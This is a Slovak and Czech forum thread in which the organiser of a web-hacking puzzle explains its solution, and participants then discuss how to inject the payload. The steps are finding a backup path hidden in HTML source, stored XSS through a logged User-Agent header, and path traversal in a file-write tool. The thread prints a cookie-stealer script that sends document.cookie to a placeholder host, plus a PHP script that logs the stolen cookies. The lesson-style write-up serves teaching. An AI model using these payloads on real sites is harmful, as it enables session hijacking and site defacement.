hadanka c.5 - vysvetlenie
******* http://pc.poradna.net/question/view/66560-hadanka-c -5-obnov-stranku *******
ok, vidim ze este nie ste pripraveni na real web hacking a preto dalsia hadanka bude lahsia a bude z kategorie basic web hacking. budem sa tu snazit vysvetlit jednotlive kroky a ich dosah, ale rozhodol som sa, ze vam to nepoviem naraz(mam rad napatie). budem to vysvetlovat po jednotlivych krokoch(celkovo su 3) a s tyzdnovym odstupom, aby ste sa este samostatne mohli(aj ked neskoro) dostat do hall of fame.
1., najprv bolo treba najst dolezitu informaciu, kde je vlastne zaloha povodnych stranok. ta sa nachadzala v subore help.html(bolo treba pozriet do zdrojakov a odscrollovat 
), na hlavnej stranke link - help.
- ponaucenie: aj ked nasi hackeri boli ocividne spicky, urobili jednu podstatnu chybu a to ze dolezite informacie ulozili do html zdrojakov, aj ked si mysleli ze ich nikto nenajde.
2., tu som chybu urobil ja. urobil som sice monitoring navstevnosti, ktory zabezpecoval script monitoring.php ale neuvedomil som si, ze aj informacie typu user_agent mozu byt zneuzite(user agent switcher(ff), proxomitron(proxy server)). tu mi utocnik vlozil cookie stealer a pri prihlaseni sa pod adminom a prezreti si monitoringu som o svoje cookie prisiel. mozny cookie stealer bol:
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>nejaky_cookie_citac.php mohol vyzerat takto:
<?php
$cookie = $_GET['c'];
$fp = fopen('mycookies.html', 'a');
fwrite($fp, "$cookie\n<br>");
fclose($fp);
?>-ponaucenie: pokial si na svojej stranke zaznamenavate aj informacie typu napr. user_agent, referrer, tak treba mysliet nato, ze aj toto je mozne zneuzit(nie len input z formulara alebo z url) a najlepsie je podla mna zmenit
< a >na znakove entity:
< a >, je s tym najmenej roboty.
3., a mame tu posledny bod. stacilo vojst do admin toolu, zadat meno a heslo, ktore sme adminovi ukradli a ako meno suboru uviest index.html a obsah spravy bol prave povodny html kod index.html v adresari _tmp_. bolo si vsak treba uvedomit ze sme v adresari _tmp_, preto ako meno sme pouzili: ../index.html(relativna cesta o uroven vyssie) alebo sme mohli pouzit absolutnu cestu: index.html. akceptovana bola aj index.html. tymto sme prepisali povodny index.html.
-ponaucenie: davajte si velkeho bacha, ak dovolite zapisovat sobory na vas web, aby tam nahodou niekto nezapisal vlastny php shell. :D
to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek, ale to mi zase asi orezal wget
Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonca staci ak by to bola linka ale na nu by musel admin kliknut. Dolezite je len ze si odosles cookie na svoj server (kam vedie ta linka). Samozrejme musis mat niekde hosting a tvoj php script ktory ti ten cookie niekde ulozi (to je ten druhy 5riadkovy php script).
cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript... melo se to zadat do user-agenta, takze jsem si udelal cmd soubor, do nej jsem dal
ale von me wget jedny uvozovky nak nebral, druhy bral ale nak jinak to neslo, no proste sem neprosel pres svyho wgeta
zkousel jsem i proxytron (nebo jak se to jmenuje), ale ten se mi nepovedlo rozchodit, nak sem vubec nepochopil system tech filtru, tak sem to hned vzdal.
dalsi moznost je samozrejme naky rozsireni do firefoxu, ale ff nepouzivam a instalovat ho.. nechci
Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris polozku general.useragent.override).
Ak FF nechces tak to je ale tvoja smola, namiesto 5sekund s FF sa drbes 3dni s nejakymi wget a proximitronmi